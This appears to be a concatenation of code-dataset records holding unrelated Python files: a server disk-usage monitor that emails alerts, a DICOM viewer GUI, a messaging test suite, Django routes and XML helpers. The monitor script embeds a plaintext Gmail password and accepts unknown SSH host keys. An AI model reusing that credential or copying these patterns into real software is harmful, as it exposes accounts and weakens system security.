print(val)\n","sub_path":"findMinimumHDist2Fastas.py","file_name":"findMinimumHDist2Fastas.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"53155908","text":"#!/usr/bin/python3\nimport os\nimport sys\nimport argparse\nimport paramiko\nimport smtplib, ssl\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom datetime import datetime, date\nfrom pathlib import Path\n\ndef get_du_stats(host):\n\n global df_out\n try:\n #cert = paramiko.RSAKey.from_private_key_file(\"tkoulech-ohio.pem\")\n cert = paramiko.RSAKey.from_private_key_file(\"tkoulech-ca.pem\")\n c = paramiko.SSHClient()\n c.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n # print(\"connecting to {}...\".format(host))\n #c.connect( hostname = host, username = \"ubuntu\", pkey = cert )\n c.connect( hostname = host, username = \"ec2-user\", pkey = cert )\n # print(\"connected!!!\")\n stdin, stdout, stderr = c.exec_command('df -h')\n df_out = stdout.readlines()[1:]\n c.close()\n\n except:\n print(\"Connection to {} Failed!!!\".format(host))\n df_out = []\n\n flagSystem = False\n #TK stream = os.popen('ssh -i \"tkoulech-ohio.pem\" -o ConnectTimeout=10 ubuntu@{} \\'df -h\\''.format(host))\n # df_out is empty if connection timed out\n #TK df_out = stream.read().splitlines()[1:]\n\n pDict[host] = []\n if df_out:\n for p in df_out:\n pArray = p.rstrip().split()\n usage, part = pArray[len(pArray) - 2], pArray[len(pArray) - 1]\n #if 80 < int(usage.rstrip('%')) < 89:\n if 40 < int(usage.rstrip('%')) < 60:\n status = 'prewarning'\n flagSystem = True\n prewarnHosts.add(host)\n elif int(usage.rstrip('%')) > 90:\n status = 'warning'\n flagSystem = True\n warnHosts.add(host)\n else:\n status = 'ok'\n\n # constract a dictionary with 'host' as a key and list of tuples as value\n pDict[host].append((part, usage, status))\n\n # constract list of OK hosts: ssh didn't fail and they do not have either pre-warning or warning partitions\n if df_out and not flagSystem: okHosts.append(host)\n if not df_out: notreachableHosts.append(host)\n return pDict\n\ndef cur_du_all(pDict):\n for h in pDict.keys():\n if pDict[h]:\n print(\"\\t -> Current Dist Usage for {}\".format(h))\n for part,usage,status in pDict[h]:\n print('\\t', f'{part:30} is at {usage}')\n print(\"\")\n\n\ndef warn_du(pDict):\n text_msg = ''\n for h in pDict.keys():\n if pDict[h]:\n print(\"\\t -> {}: critical disk usage\".format(h))\n text_msg += '''\\n\\t -> {}: critical disk usage'''.format(h)\n for part,usage,status in pDict[h]:\n if status == 'warning':\n text_msg += '''\\n\\t {:30} is at {}'''.format(part, usage)\n print('\\t', f'{part:30} is at {usage}')\n print(\"\")\n return text_msg\n\n\ndef prewarn_du(pDict):\n text_msg = ''\n for h in pDict.keys():\n if pDict[h]:\n print(\"\\t -> {}: pre-warning disk usage\".format(h))\n LF.write(\"\\t -> {}: pre-warning disk usage\\n\".format(h))\n text_msg += '''\\n\\t -> {}: pre-warning disk usag'''.format(h)\n for part,usage,status in pDict[h]:\n if status == 'prewarning':\n text_msg += '''\\n\\t {:30} is at {}'''.format(part, usage)\n print('\\t', f'{part:30} is at {usage}')\n LF.write(\"\\t{0:30} is at {1}\\n\".format(part, usage))\n\n print(\"\")\n return text_msg\n\nif __name__ == '__main__':\n okHosts = []\n notreachableHosts = []\n prewarnHosts = set()\n warnHosts = set()\n pDict = {}\n text_msg = ''\n\n parser = argparse.ArgumentParser(description=\"Servers list\")\n parser.add_argument('-s', '--sspec', dest='sspec', metavar='server_spec', required=True, help='path to a server spec file')\n args = parser.parse_args()\n sspec = args.sspec\n\n #servers = '/home/ubuntu/monitoring/servers.txt'\n #servers = '/home/ec2-user/scripts/servers.txt'\n\n\n # check if 'servers' file exists and valid\n if not os.path.isfile(sspec):\n sys.exit(\"server's specification file {} is not valid\".format(sspec))\n\n now = datetime.now()\n current_time = now.strftime(\"%H%M%S\")\n today = date.today()\n current_date = today.strftime(\"%Y%m%d\")\n\n\n for host in open(sspec).read().splitlines():\n pDict = get_du_stats(host)\n\n # create log dir and logfiles\n logDir = '/home/ec2-user/UsageLogDir'\n logFile = 'serversUsage' + '_' + current_date + '_' + current_time\n logFilePath = os.path.join(logDir, logFile) \n print(\"logFile: \", logFilePath)\n if os.path.exists(logDir):\n if os.path.isfile(logDir):\n os.rename(\"{0}\".format(logDir), \"{0}.renamed_{1}_{2}\".format(logDir, current_date, current_time))\n os.makedirs(logDir)\n else:\n os.makedirs(logDir)\n\n LF = open(logFilePath, 'a')\n # with open (logFilePath, 'a') as LF:\n LF.write(\"Servers checked on {} {}:\\n\".format(current_date, current_time))\n # items from the file can be read differently\n # https://realpython.com/read-write-files-python/\n ### var 1\n for srv in Path(sspec).read_text().splitlines():\n LF.write(\"\\t {}\\n\".format(srv))\n\n ### var 2\n #for srv in list(open(sspec)):\n # LF.write(\"\\t {}\".format(srv))\n\n ### var 3\n #with open(sspec) as reader:\n # for srv in reader.readlines():\n # LF.write(\"\\t {}\".format(srv))\n\n # test dump full report\n # for x in pDict:\n # LF.writelines(\"{}: {}\\n\".format(x, pDict[x]))\n \n # Report hosts that timed out on ssh\n if notreachableHosts:\n # log non-reachable hosts\n LF.write(\"*** Servers are not reachable ***\\n\")\n print(\"*** Servers are not reachable ***\")\n text_msg += '''\\n\\n*** Servers are not reachable ***'''\n for h in notreachableHosts:\n print('\\t -> ssh connection timed out on ', h)\n LF.write(\"\\t -> ssh connection timed out on {}\\n\".format(h))\n text_msg += '''\\n\\t -> ssh connection timed out on {}'''.format(host)\n print(\"\")\n\n\n # Report hosts in Pre-Warning level\n if prewarnHosts:\n text_msg += '''\\n\\n*** PRE-WARNING: Servers with partitions at pre-warning level ***'''\n LF.write(\"*** PRE-WARNING: Servers with partitions at pre-warning level ***\\n\")\n print(\"*** PRE-WARNING: Servers with partitions at pre-warning level ***\")\n text_msg += prewarn_du(pDict)\n print(\"\")\n\n # Report hosts in Warning level\n if warnHosts:\n print(\"*** WARNING: Servers with partitions at a critical level ***\")\n text_msg += '''\\n\\n*** WARNING: Servers with partitions at a critical level ***'''\n text_msg += warn_du(pDict)\n print(\"\")\n\n # current disk usage for all hosts\n print(\"*** Servers disk usage ***\")\n cur_du_all(pDict)\n print(\"\")\n\n # Report hosts that are okay (no pre-warn, warn partitions)\n if okHosts:\n print(\"*** Servers with normal disk space usage ***\")\n for h in okHosts:\n print('\\t', h)\n\n\n if warnHosts or prewarnHosts or notreachableHosts:\n s_email = 'tiadevops@gmail.com'\n gmailpassword = 'tiadevops2020'\n r_email = 'tiadevops@gmail.com'\n port = 465 # For SSL\n smtp_server = \"smtp.gmail.com\"\n msg = MIMEMultipart(\"alternative\")\n msg['Subject'] = f'!!!Alert!!!: Disk usage report {current_date}_{current_time}'\n msg['From'] = 'tiadevops@gmail.com'\n msg['To'] = 'tiadevops@gmail.com'\n\n # Turn these into plain/html MIMEText objects\n part1 = MIMEText(text_msg, \"plain\")\n msg.attach(part1)\n\n # use create_default_context() from the ssl module. This will load the system’s trusted CA certificates,\n # enable host name checking and certificate validation,\n # and try to choose reasonably secure protocol and cipher settings.\n context = ssl.create_default_context()\n # Start an SMTP connection that is secured from the beginning using SMTP_SSL()\n with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:\n server.login(s_email, gmailpassword)\n server.sendmail(s_email, r_email, msg.as_string())\n # print(\" \\n Sent!\")\n\n LF.close()\n sys.exit(0)\n","sub_path":"current_usage_report.py","file_name":"current_usage_report.py","file_ext":"py","file_size_in_byte":8502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"249593984","text":"import string\n\na =input(\"upiši neki broj: \")\n\nwhile (a):\n test=a[-1]\n a=a[0:-1]\n if test in a:\n print (\"broj nije pandigitalan\")\n break\nif not a:\n print (\"broj je pandigitalan\") ","sub_path":"PYTHON/IT/test/pandigital_blunt.py","file_name":"pandigital_blunt.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"57660697","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import division\n\nimport os\nimport sys\nimport traceback\nimport unittest\n\nLIB_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nif not LIB_PATH in sys.path:\n sys.path.append(LIB_PATH)\nfrom common.mods import Mods\nfrom common.message import Message\nfrom common.settings import Settings\nfrom common.base_test_case import BaseTestCase\n\n\nclass TestMessage(BaseTestCase):\n test_mod = Mods.Message\n\n @classmethod\n def setUpClass(cls):\n \"\"\"wifi 开启与否不影响测试\"\"\"\n super(TestMessage, cls).setUpClass()\n mdevice = \"MDEVICE\"\n sdevice = \"SDEVICE\"\n # mdevice = \"GAWKFQT8WGL7L7S8\"\n # sdevice = \"3dd7a889\"\n cls.mod = Message(mdevice, cls.test_mod, sdevice)\n cls.set = Settings(cls.mod.device, \"Settings\")\n cls.is_multi = True if cls.mod.config.site == \"US\" else False\n\n # @unittest.skip(\"debug\")\n def testStability3G(self):\n \"\"\"\n send draft case is invalid, new message will not save as draft.\n :return:\n \"\"\"\n if self.set.get_carrier_service_num() == \"10086\":\n self.set.logger.info(\"you are using CMCC sim card, using 4G instead of 3G test cases\")\n self.set.switch_network_for_multi_menus(\"ALL\")\n else:\n self.set.switch_network_for_multi_menus(\"3G\")\n self.case_forward_msg('SMS', int(self.dicttesttimes.get(\"SMS3G\".lower(), 0)))\n\n # @unittest.skip(\"debug\")\n def testStabilityLTE(self):\n \"\"\"\n send draft case is invalid, new message will not save as draft.\n :return:\n \"\"\"\n self.set.switch_network_for_multi_menus(\"ALL\")\n self.case_forward_msg('SMS', int(self.dicttesttimes.get(\"SMSLTE\".lower(), 0)))\n self.case_forward_msg('MMS', int(self.dicttesttimes.get(\"MMSLTE\".lower(), 0)))\n\n def case_forward_msg(self, msg_type, times=1):\n \"\"\"case function, forward message case.\n arg: msg_type(str) -- sms or mms.\n check forward msg results\n \"\"\"\n msg_receiver = self.mod.sdevice_tel if self.is_multi else self.mod.get_carrier_service_num()\n self.mod.logger.debug(\"Send %s %s times.\" % (msg_type, times))\n self.mod.enter_new()\n for loop in range(times):\n try:\n if self.mod.fwd_msg(msg_type, msg_receiver):\n self.trace_success()\n else:\n self.trace_fail()\n self.mod.delete_extra_msg()\n except:\n self.mod.logger.warning(traceback.format_exc())\n self.mod.save_fail_img()\n finally:\n self.mod.device.delay()\n self.mod.back_to_message()\n self.mod.back_to_home()\n self.mod.logger.debug(\"Send %s Msg Test complete.\" % msg_type)\n\n def quickReplyMsg(self, times):\n \"\"\"case function, answer s-device message during play music\n check receive、answer message and back to music results\n \"\"\"\n self.mod.logger.debug(\"Quick reply during music %d times.\" % times)\n self.mod.music.play_music()\n for loop in range(times):\n try:\n if self.mod.s_send_msg(loop) and self.mod.answer_musicing(loop):\n self.trace_success()\n else:\n self.trace_fail()\n except:\n self.mod.logger.warning(traceback.format_exc())\n self.mod.save_fail_img()\n self.mod.back_to_home()\n self.mod.back_to_home_s()\n self.mod.music.close_music()\n self.mod.logger.debug(\"Quick reply during music %d times completed.\" % times)\n\n\nif __name__ == '__main__':\n suite1 = unittest.TestLoader().loadTestsFromTestCase(TestMessage)\n suite = unittest.TestSuite([suite1])\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"MILAN_MTBF/stability/04_Messaging.py","file_name":"04_Messaging.py","file_ext":"py","file_size_in_byte":3888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"305168038","text":"from django.conf.urls import url\nfrom .views import (\n ProfileDetailView,\n RecipeBooksListView,\n ProfileUpdateView,\n follow_view,\n FollowingListView,\n FollowersListView,\n)\n\nurlpatterns = [\n url(r'p/(?P\\w+)$', ProfileDetailView.as_view(), name='profile'),\n url(r'p/(?P\\w+)/following$',\n FollowingListView.as_view(),\n name='following_list'),\n url(r'p/(?P\\w+)/followers$',\n FollowersListView.as_view(),\n name='followers_list'),\n url('recipebooks/(?P\\w+)',\n RecipeBooksListView.as_view(),\n name='profile_recipebooks'),\n url('edit$', ProfileUpdateView.as_view(), name='edit_profile'),\n url('follow/(?P\\w+)$', follow_view, name='follow'),\n]\n","sub_path":"user_profile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"480523767","text":"import os\nimport re\n#import docx\nimport pandas as pd\nimport tkinter as tk\n#from docx import Document\nfrom tkinter import filedialog\n#from win32com import client as wc\n#from prettytable import PrettyTable\nfrom openpyxl import Workbook\nfrom openpyxl import load_workbook\nfrom PIL import ImageTk,Image\n\nimport copy\nimport numpy as np\nimport cv2\nimport pydicom\nimport SimpleITK as sitk\nfrom mpl_toolkits.mplot3d import Axes3D\nimport sys\nfrom matplotlib import pyplot as plt\nimport matplotlib\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg,NavigationToolbar2Tk\nmatplotlib.use('TkAgg')\nfrom matplotlib.figure import Figure\nimport tkinter.messagebox\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection\nfrom tkinter import filedialog\nimport skimage\nfrom skimage import measure, feature\n\n\n\ndef get_image(filename,width,height):\n im = Image.open(filename).resize((width,height))\n return ImageTk.PhotoImage(im)\n\ndef loadSerise(filename,id):\n reader = sitk.ImageSeriesReader()#读取dicom序列\n reader.MetaDataDictionaryArrayUpdateOn()#这一步是加载公开的元信息\n reader.LoadPrivateTagsOn()#这一步是加载私有的元信息\n series_IDs = sitk.ImageSeriesReader.GetGDCMSeriesIDs(filename)#根据文件夹获取序列ID,一个文件夹里面通常是一个病人的所有切片,会分为好几个序列\n\n dicom_names = reader.GetGDCMSeriesFileNames( filename,series_IDs[id])#选取其中一个序列ID,获得该序列的若干文件名\n reader.SetFileNames(dicom_names)#设置文件名\n image3D = reader.Execute()#读取dicom序列\n imgArray=sitk.GetArrayFromImage(image3D)#转换为numpy数据\n return imgArray.astype(np.float32)\ndef plot_3d(image, threshold=-300):\n \n # Position the scan upright, \n # so the head of the patient would be at the top facing the camera\n p = image.transpose(2,1,0)\n \n verts, faces = skimage.measure.marching_cubes_classic(p, threshold)\n #verts, faces = measure.marching_cubes(p, threshold)\n plt.subplot(224)\n fig = plt.figure(figsize=(10, 10))\n ax = fig.add_subplot(111, projection='3d')\n\n # Fancy indexing: `verts[faces]` to generate a collection of triangles\n mesh = Poly3DCollection(verts[faces], alpha=0.70)\n face_color = [0.45, 0.45, 0.75]\n mesh.set_facecolor(face_color)\n ax.add_collection3d(mesh)\n\n ax.set_xlim(0, p.shape[0])\n ax.set_ylim(0, p.shape[1])\n ax.set_zlim(0, p.shape[2])\n\n plt.show()\ndef show1(z):\n global templateImg\n global winNew\n global v4\n\n\n\n if v4==0:\n plt.close('all')\n #global canvas\n matplotlib.use('TkAgg') #使用组件\n fig1=plt.figure(1)\n #plt.imshow(templateImg[20,:,:], cmap='gray')\n plt.imshow(templateImg[5,:,:], cmap='gray')\n plt.axis('off')\n if v4==1:\n s1=int(z)\n plt.close('all')\n #global canvas\n matplotlib.use('TkAgg') #使用组件\n fig1=plt.figure(1)\n #plt.imshow(templateImg[20,:,:], cmap='gray')\n plt.imshow(templateImg[s1,:,:], cmap='gray')\n plt.axis('off')\n\n\n canvas11=FigureCanvasTkAgg(fig1,winNew)\n canvas11.draw() #以前的版本使用show()方法,matplotlib 2.2之后不再推荐show()用draw代替,但是用show不会报错,会显示警告\n #canvas1.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n canvas11.get_tk_widget().place(relx=0, rely=0, width=350, height=300)\n\ndef show2(z):\n global templateImg\n global winNew\n global v4\n\n\n if v4==0:\n plt.close('all')\n #global canvas\n matplotlib.use('TkAgg') #使用组件\n fig1=plt.figure(1)\n #plt.imshow(templateImg[20,:,:], cmap='gray')\n plt.imshow(templateImg[:,200,:], cmap='gray')\n plt.axis('off')\n if v4==1:\n s1=int(z)\n plt.close('all')\n #global canvas\n matplotlib.use('TkAgg') #使用组件\n fig1=plt.figure(1)\n plt.imshow(templateImg[:,s1,:], cmap='gray')\n plt.axis('off')\n\n\n canvas22=FigureCanvasTkAgg(fig1,winNew)\n canvas22.draw()\n canvas22.get_tk_widget().place(relx=0.4, rely=0, width=350, height=300)\n\ndef show3(z):\n global templateImg\n global winNew\n global v4\n\n\n if v4==0:\n plt.close('all')\n matplotlib.use('TkAgg') #使用组件\n fig1=plt.figure(1)\n plt.imshow(templateImg[:,:,300], cmap='gray')\n plt.axis('off')\n if v4==1:\n s1=int(z)\n plt.close('all')\n #global canvas\n matplotlib.use('TkAgg') #使用组件\n fig1=plt.figure(1)\n plt.imshow(templateImg[:,:,s1], cmap='gray')\n plt.axis('off')\n\n\n canvas33=FigureCanvasTkAgg(fig1,winNew)\n canvas33.draw()\n canvas33.get_tk_widget().place(relx=0, rely=0.5, width=350, height=300)\ndef show():\n global templateImg\n global winNew\n global fig1\n global fig2\n global fig3\n global fig4\n\n global canvas11\n global canvas22\n global canvas33\n global canvas44\n global v4\n\n s1=v1.get()\n s2=v2.get()\n s3=v3.get()\n\n \n\n print (s1,s2,s3)\n print (v4)\n plt.close('all')\n #global canvas\n matplotlib.use('TkAgg') #使用组件\n if v4==0:\n fig1=plt.figure(1)\n #plt.imshow(templateImg[20,:,:], cmap='gray')\n plt.imshow(templateImg[100,:,:], cmap='gray')\n #plt.show()\n #best_frame_raw = templateImg[:,220,:]\n #plt.cla()\n \n fig2=plt.figure(2)\n #plt.imshow(best_frame_raw,cmap='gray')\n #plt.imshow(templateImg[:,510,:], cmap='gray')\n plt.imshow(templateImg[:,200,:], cmap='gray')\n #plt.show()\n fig3=plt.figure(3)\n #plt.imshow(templateImg[:,:,510], cmap='gray')\n plt.imshow(templateImg[:,:,300], cmap='gray')\n #plt.show()\n \n fig4=plt.figure(4)\n four= plt.imread(r'C:\\Users\\Administrator\\Desktop\\keyan\\pythongui\\Figure_2.png')\n plt.imshow(four)\n \n canvas11=FigureCanvasTkAgg(fig1,winNew)\n canvas11.draw() #以前的版本使用show()方法,matplotlib 2.2之后不再推荐show()用draw代替,但是用show不会报错,会显示警告\n #canvas1.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n canvas11.get_tk_widget().place(relx=0, rely=0, width=350, height=300)\n \n canvas22=FigureCanvasTkAgg(fig2,winNew)\n canvas22.draw()\n canvas22.get_tk_widget().place(relx=0.4, rely=0, width=350, height=300)\n #canvas2.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n \n canvas33=FigureCanvasTkAgg(fig3,winNew)\n canvas33.draw()\n canvas33.get_tk_widget().place(relx=0, rely=0.5, width=350, height=300)\n #canvas3.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n \n canvas44=FigureCanvasTkAgg(fig4,winNew)\n canvas44.draw()\n canvas44.get_tk_widget().place(relx=0.4, rely=0.5, width=350, height=300)\n if v4==1:\n \n fig1=plt.figure(1)\n #plt.imshow(templateImg[20,:,:], cmap='gray')\n plt.imshow(templateImg[s1,:,:], cmap='gray')\n plt.axis('off')\n #plt.show()\n #best_frame_raw = templateImg[:,220,:]\n #plt.cla()\n \n fig2=plt.figure(2)\n #plt.imshow(best_frame_raw,cmap='gray')\n #plt.imshow(templateImg[:,510,:], cmap='gray')\n plt.imshow(templateImg[:,s2,:], cmap='gray')\n plt.axis('off')\n #plt.show()\n fig3=plt.figure(3)\n #plt.imshow(templateImg[:,:,510], cmap='gray')\n plt.imshow(templateImg[:,:,s3], cmap='gray')\n plt.axis('off')\n #plt.show()\n \n fig4=plt.figure(4)\n four= plt.imread(r'C:\\Users\\Administrator\\Desktop\\keyan\\pythongui\\Figure_2.png')\n plt.imshow(four)\n plt.axis('off')\n\n\n \n canvas11=FigureCanvasTkAgg(fig1,winNew)\n canvas11.draw() #以前的版本使用show()方法,matplotlib 2.2之后不再推荐show()用draw代替,但是用show不会报错,会显示警告\n #canvas1.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n canvas11.get_tk_widget().place(relx=0, rely=0, width=350, height=300)\n \n canvas22=FigureCanvasTkAgg(fig2,winNew)\n canvas22.draw()\n canvas22.get_tk_widget().place(relx=0.4, rely=0, width=350, height=300)\n #canvas2.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n \n canvas33=FigureCanvasTkAgg(fig3,winNew)\n canvas33.draw()\n canvas33.get_tk_widget().place(relx=0, rely=0.5, width=350, height=300)\n #canvas3.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n \n canvas44=FigureCanvasTkAgg(fig4,winNew)\n canvas44.draw()\n canvas44.get_tk_widget().place(relx=0.4, rely=0.5, width=350, height=300)\n\ndef main():\n\n filename = filedialog.askdirectory() #获得选择好的文件夹\n global templateImg\n global winNew\n global v4\n\n\n v4=0\n \n templateImg = loadSerise(filename,0)\n winNew = tk.Toplevel(w)\n winNew.geometry('1200x800')\n winNew.title('三维显示')\n \n \n \n print(templateImg.shape)\n \n matplotlib.use('TkAgg') #使用组件\n fig1=plt.figure(1)\n #plt.imshow(templateImg[20,:,:], cmap='gray')\n plt.imshow(templateImg[100,:,:], cmap='gray')\n #plt.show()\n #best_frame_raw = templateImg[:,220,:]\n #plt.cla()\n \n fig2=plt.figure(2)\n #plt.imshow(best_frame_raw,cmap='gray')\n #plt.imshow(templateImg[:,510,:], cmap='gray')\n plt.imshow(templateImg[:,200,:], cmap='gray')\n #plt.show()\n fig3=plt.figure(3)\n #plt.imshow(templateImg[:,:,510], cmap='gray')\n plt.imshow(templateImg[:,:,300], cmap='gray')\n #plt.show()\n \n fig4=plt.figure(4)\n four= plt.imread(r'C:\\Users\\Administrator\\Desktop\\keyan\\pythongui\\Figure_2.png')\n plt.imshow(four)\n \n canvas11=FigureCanvasTkAgg(fig1,winNew)\n canvas11.draw() #以前的版本使用show()方法,matplotlib 2.2之后不再推荐show()用draw代替,但是用show不会报错,会显示警告\n #canvas1.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n canvas11.get_tk_widget().place(relx=0, rely=0, width=350, height=300)\n \n canvas22=FigureCanvasTkAgg(fig2,winNew)\n canvas22.draw()\n canvas22.get_tk_widget().place(relx=0.4, rely=0, width=350, height=300)\n #canvas2.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n \n canvas33=FigureCanvasTkAgg(fig3,winNew)\n canvas33.draw()\n canvas33.get_tk_widget().place(relx=0, rely=0.5, width=350, height=300)\n #canvas3.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n \n canvas44=FigureCanvasTkAgg(fig4,winNew)\n canvas44.draw()\n canvas44.get_tk_widget().place(relx=0.4, rely=0.5, width=350, height=300)\n global photo\n #image = Image.fromarray(templateImg[:,:,200])\n photo = ImageTk.PhotoImage(Image.fromarray(templateImg[100,:,:]))\n pic_lb=tk.Label(winNew, image=photo)\n pic_lb.place(relx=0.4, rely=0.5,)\n\n\n \n #pic_lb=tk.Label(winNew, image=photo).grid(row=1, column=1)\n #photo.pack()\n \n #canvas4.get_tk_widget().pack(side=tk.TOP, expand = 0.5)\n \n #把matplotlib绘制图形的导航工具栏显示到tkinter窗口上\n #toolbar =NavigationToolbar2Tk(canvas1, winNew) #matplotlib 2.2版本之后推荐使用NavigationToolbar2Tk,若使用NavigationToolbar2TkAgg会警告\n #toolbar.update()\n #canvas1._tkcanvas.place(relx=0.5, rely=0.9)\n \n t1=tk.Entry(winNew,width=20,textvariable=v1)\n t1.place(relx=0.25,rely=0.4,relwidth=0.05,relheight=0.05)\n \n lb1 = tk.Label(winNew,text='')\n lb1.place(relx=0.75,rely=0.05)\n lb1.config(text='您选择的路径是:'+str(filename))\n text = tk.Text(winNew, width=25, height=15)\n text.place(relx=0.75,rely=0.1)\n text.insert(tk.INSERT, '分析结果是:'+'\\n')\n \n\n \n t2=tk.Entry(winNew,width=20,textvariable=v2)\n t2.place(relx=0.63,rely=0.4,relwidth=0.05,relheight=0.05)\n #lb2 = tk.Label(winNew,text='y')\n #lb2.place(relx=0.4,rely=0.05)\n \n t3=tk.Entry(winNew,width=20,textvariable=v3)\n t3.place(relx=0.25,rely=0.9,relwidth=0.05,relheight=0.05)\n #lb3 = tk.Label(winNew,text='z')\n #lb3.place(relx=0.6,rely=0.05)\n \n scl = tk.Scale(winNew,orient=\"horizontal\",length=200,from_=1,to=245,label='x',tickinterval=244,resolution=1,variable=v1,command=show1)\n scl.place(relx=0.05,rely=0.38)\n sc2 = tk.Scale(winNew,orient=\"horizontal\",length=200,from_=1,to=512,label='y',tickinterval=511,resolution=1,variable=v2,command=show2)\n sc2.place(relx=0.45,rely=0.38)\n sc3 = tk.Scale(winNew,orient=\"horizontal\",length=200,from_=1,to=512,label='z',tickinterval=511,resolution=1,variable=v3,command=show3)\n sc3.place(relx=0.05,rely=0.88)\n\n btClose=tk.Button(winNew,text='关闭',command=winNew.destroy)\n btClose.place(relx=0.9,rely=0.9)\n btn = tk.Button(winNew,text=\"OK\",command=show)\n btn.place(relx=0.8,rely=0.9)\n v4=1\n\n \n #plt.subplot(224)\n #plot_3d(templateImg, 300)\n\n \n \n \nw=tk.Tk() \nw.geometry('1000x600') \nw.title(\"智能骨折分析系统\") \nl = tk.Label(w, width=50, text='')\nl.pack()\ncanvas_root = tkinter.Canvas(w,width= 800,height=600)\nim_root =get_image(r'C:\\Users\\Administrator\\Desktop\\keyan\\pythongui\\Figure_2.png',800,600)\ncanvas_root.create_image(400,300,image=im_root)\n#canvas_root.pack()\ncanvas_root.place(relx=0,rely=0)\nwClose=tk.Button(w,text='关闭',command=w.destroy)\nwClose.place(relx=0.9,rely=0.9)\ndcm_open=tk.Button(w,text='选择文件',command=main)\ndcm_open.place(relx=0.82,rely=0.9)\nm=tk.Menu(w) \nw.config(menu=m) \ninsesrtmenu=tk.Menu(m) \nm.add_cascade(label=\"导入文件\",menu=insesrtmenu) \ninsesrtmenu.add_command(label=\" 选择文件夹\",command=main)\n\nfmenu=tk.Menu(m) \nm.add_cascade(label=\"分析\",menu=fmenu) \nfmenu.add_command(label=\"按文件分类\",command=main) \nfmenu.add_command(label=\"按数量分类\",command=main) \nfmenu.add_command(label=\"按元件分类\",command=main)\nfmenu.add_command(label=\"多条件查询\",command=main)\n#templateImg=tk.Variable()\nv1=tk.Variable()\nv2=tk.Variable()\nv3=tk.Variable()\nv4=tk.Variable()\nif v4==1:\n show()\n#winNew=tk.Variable()\n\n#tk.mainloop()\nif __name__ == \"__main__\":\n if v4==1:\n show()\n\n\n\n","sub_path":"pythongui/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":14248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"378344407","text":"#\n# Copyright (c) European Synchrotron Radiation Facility (ESRF)\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\n# this software and associated documentation files (the \"Software\"), to deal in\n# the Software without restriction, including without limitation the rights to\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of\n# the Software, and to permit persons to whom the Software is furnished to do so,\n# subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\n# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\n# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\n# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n#\n\n__authors__ = [\"O. Svensson\"]\n__license__ = \"MIT\"\n__date__ = \"21/04/2019\"\n\n# Corresponding EDNA code:\n# https://github.com/olofsvensson/edna-mx\n# kernel/src/EDUtilsTable.py\n\nimport json\nimport xmltodict\n\nfrom edna2.utils import UtilsLogging\n\nlogger = UtilsLogging.getLogger()\n\n\ndef getDict(dnaTablesPath):\n with open(str(dnaTablesPath)) as f:\n dnaTables = f.read()\n if \"\" not in dnaTables:\n # Fix for bug in MOSFLM\n dnaTables += \"\"\n orderedDictDnaTables = xmltodict.parse(dnaTables)\n dictDnaTables = json.loads(json.dumps(orderedDictDnaTables))\n return dictDnaTables\n\n\ndef getTables(dictDnaTables, tableName):\n listTables = []\n listTable = dictDnaTables[\"dna_tables\"][\"table\"]\n for table in listTable:\n if tableName == table[\"@name\"]:\n listTables.append(table)\n return listTables\n\n\ndef getListParam(table):\n if isinstance(table[\"list\"], list):\n listParam = table[\"list\"]\n else:\n listParam = [table[\"list\"]]\n return listParam\n\n\ndef getItemValue(dictParameter, key):\n value = None\n if isinstance(dictParameter[\"item\"], list):\n listItem = dictParameter[\"item\"]\n else:\n listItem = [dictParameter[\"item\"]]\n for item in listItem:\n if item[\"@name\"] == key:\n value = item[\"#text\"]\n return _convertFromString(value)\n\n\ndef _convertFromString(value):\n if value is not None:\n try:\n if \".\" in value:\n value = float(value)\n else:\n value = int(value)\n except ValueError:\n # The value is returned as a string...\n pass\n return value\n\n\ndef getListValue(listParameter, key1, key2):\n value = None\n for dictParameter in listParameter:\n if dictParameter[\"@name\"] == key1:\n if isinstance(dictParameter[\"item\"], list):\n for item in dictParameter[\"item\"]:\n if item[\"@name\"] == key2:\n value = item[\"#text\"]\n else:\n value = dictParameter[\"item\"][\"#text\"]\n return 